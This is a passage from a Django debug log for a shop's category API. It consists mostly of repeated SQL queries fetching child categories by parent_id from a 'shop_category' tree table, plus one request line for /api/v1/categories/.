"shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-20 02:38:06,126 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-20 02:38:06,134 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-20 02:38:06,138 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-20 02:38:06,143 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-20 02:38:06,147 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-20 02:38:06,152 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-20 02:38:06,158 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-20 02:38:06,162 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-20 02:38:06,166 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-20 02:38:06,170 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-20 02:38:06,175 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-20 02:38:06,181 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-20 02:38:06,186 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-20 02:38:06,191 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-20 02:38:06,194 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-20 02:38:06,197 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-20 02:38:06,199 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-20 02:38:06,202 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-20 02:38:06,204 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-20 02:38:06,207 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-20 02:38:06,209 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-20 02:38:06,212 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [20/Dec/2019 02:38:06] "GET /api/v1/categories/ HTTP/1.0" 200 15396 DEBUG 2019-12-20 02:38:16,328 utils 4252 140031492613888 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-20 02:38:16,334 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-20 02:38:16,337 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-20 02:38:16,340 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-20 02:38:16,343 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-20 02:38:16,345 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-20 02:38:16,347 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-20 02:38:16,349 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-20 02:38:16,352 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-20 02:38:16,355 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-20 02:38:16,357 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-20 02:38:16,359 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-20 02:38:16,361 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-20 02:38:16,364 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-20 02:38:16,367 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-20 02:38:16,369 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-20 02:38:16,371 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-20 02:38:16,373 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-20 02:38:16,376 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-20 02:38:16,379 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-20 02:38:16,382 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-20 02:38:16,384 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-20 02:38:16,387 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-20 02:38:16,389 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-20 02:38:16,391 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-20 02:38:16,394 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-20 02:38:16,396 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-20 02:38:16,399 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-20 02:38:16,401 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-20 02:38:16,403 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-20 02:38:16,406 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-20 02:38:16,408 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-20 02:38:16,411 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-20 02:38:16,413 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-20 02:38:16,415 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-20 02:38:16,419 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-20 02:38:16,421 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-20 02:38:16,424 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-20 02:38:16,426 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-20 02:38:16,428 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-20 02:38:16,430 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-20 02:38:16,433 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-20 02:38:16,435 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-20 02:38:16,438 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-20 02:38:16,441 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY 